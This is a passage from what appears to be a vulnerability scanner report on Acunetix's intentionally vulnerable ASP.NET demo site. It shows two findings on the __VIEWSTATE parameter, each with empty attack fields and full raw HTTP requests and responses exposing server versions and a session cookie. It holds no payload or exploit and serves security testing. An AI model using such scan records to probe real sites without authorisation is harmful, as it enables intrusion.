06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8444&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBA%2FT9VDdsIZGRkxPAoCcQmov17WVrPi9jEwE5Uw3o%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKEtOrmBQLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBXKh7Qp0boJjDZ%2BNPBJ8rcCYIuTy
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:24:54 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBA/T9VDdsIZGRkxPAoCcQmov17WVrPi9jEwE5Uw3o=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKEtOrmBQLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBXKh7Qp0boJjDZ+NPBJ8rcCYIuTy" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:White" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8432&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBACEPnA9sIZGRkwPvqejtYHIKmFuRGrIgKdbveueA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKIjLH9AwLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBa8Bz3WDGnjh%2BOmeBNaiOsIYLhnm
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:03 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBACEPnA9sIZGRkwPvqejtYHIKmFuRGrIgKdbveueA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKIjLH9AwLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBa8Bz3WDGnjh+OmeBNaiOsIYLhnm" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:White" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a 